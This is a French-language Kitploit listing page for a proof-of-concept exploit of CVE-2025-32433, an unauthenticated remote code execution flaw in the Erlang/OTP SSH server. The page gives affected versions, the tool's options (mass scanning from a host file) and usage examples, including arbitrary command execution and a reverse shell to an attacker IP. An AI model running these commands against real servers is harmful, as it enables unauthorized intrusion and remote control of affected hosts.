Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC — La vulnérabilité permet à un attaquant ayant un accès réseau à un serveur SSH Erlang/OTP d'exécuter du code arbitraire sans authentification préalable. | Kitploit
Outils/GitHubGitHub/omer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc
Analyse des VulnérabilitésExploitationSécurité RéseauTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubomer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

La vulnérabilité permet à un attaquant ayant un accès réseau à un serveur SSH Erlang/OTP d'exécuter du code arbitraire sans authentification préalable.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
162il y a 1 anPas encore vérifié

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

La vulnérabilité permet à un attaquant disposant d'un accès réseau à un serveur SSH Erlang/OTP d'exécuter du code arbitraire sans authentification préalable.

Description

Une vulnérabilité grave a été identifiée dans le serveur SSH Erlang/OTP qui pourrait permettre à un attaquant d'effectuer une exécution de code à distance non authentifiée (RCE). En exploitant une faille dans le traitement des messages du protocole SSH, un acteur malveillant pourrait obtenir un accès non autorisé aux systèmes affectés et exécuter des commandes arbitraires sans informations d'identification valides. Cela pourrait entraîner une compromission desdits hôtes, permettant un accès non autorisé et une manipulation de données sensibles par des tiers, ou des attaques par déni de service.

Versions affectées

root@kitploit:~
OTP-27.3.2 et versions antérieures
OTP-26.2.5.10 et versions antérieures
OTP-25.3.2.19 et versions antérieures

Fonctionnalités

  • Vérification de vulnérabilité : Déterminer si une cible est vulnérable à CVE-2025-32433.
  • Exécution d'exploit : Exécuter des commandes arbitraires.
  • Shell inversé : Lancer un shell inversé basé sur bash.

Utilisation

root@kitploit:~
python cve-2025-32433.py <host> [options]

Options :

root@kitploit:~
-p PORT, --port PORT : Port SSH (défaut : 22)

-t TIMEOUT, --timeout TIMEOUT : Délai d'attente de connexion en secondes (défaut : 5)

-c COMMAND, --command COMMAND : Commande personnalisée à exécuter

--check : Vérifier si la cible est vulnérable

-u urls.txt, --urlfile urls.txt : Fichier contenant la liste des hôtes à scanner (un par ligne)

-o output.txt, --output output.txt : Fichier de sortie pour stocker les résultats.

--shell : Lancer un shell inversé

--lhost LHOST : IP de l'attaquant pour le shell inversé

--lport LPORT : Port de l'attaquant pour le shell inversé (défaut : 4444)

Exemples :

Vérifier la vulnérabilité :

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --check

Exécuter une commande :

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'

Lancer un shell inversé :

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

Références

GitHub Advisory

NVD CVE-2025-32433

Platform Security

Télécharger l’outil